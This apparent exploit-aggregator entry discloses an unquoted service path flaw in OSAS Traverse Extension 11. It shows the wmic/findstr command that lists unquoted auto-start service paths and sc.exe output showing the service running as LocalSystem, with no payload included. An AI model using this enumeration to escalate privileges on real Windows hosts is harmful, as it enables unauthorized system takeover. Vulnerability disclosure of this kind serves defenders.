Exploit for OSAS Traverse Extension 11 Unquoted Service Path

Name: Exploit for OSAS Traverse Extension 11 Unquoted Service Path
Rating: 5 (223 reviews)

2021-03-22 | CVSS 0.2

## https://sploitus.com/exploit?id=PACKETSTORM:161901
# Exploit Title: OSAS Traverse Extension 11 - 'travextensionhostsvc' Unquoted Service Path  
# Exploit Auth: Tech Johnny  
# Vendor Homepage: https://www.osas.com  
# Version: 11 x86  
# Tested on: Windows 2012R2  
  
Details:  
  
C:\Windows\system32>wmic service get name, pathname, displayname,  
startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr  
/i /v """  
  
TRAVERSE Automation Service TravExtensionHostSvc C:\Program Files\Open  
Systems, Inc\TRAVERSE\TRAVERSE.Host.CustomExtensions.exe Auto  
  
C:\Windows\system32>sc.exe qc travextensionhostsvc  
[SC] QueryServiceConfig SUCCESS  
SERVICE_NAME: travextensionhostsvc  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START (DELAYED)  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : C:\Program Files\Open Systems,Inc\TRAVERSE\TRAVERSE.Host.CustomExtensions.exe  
LOAD_ORDER_GROUP : TAG : 0  
DISPLAY_NAME : TRAVERSE Automation Service  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem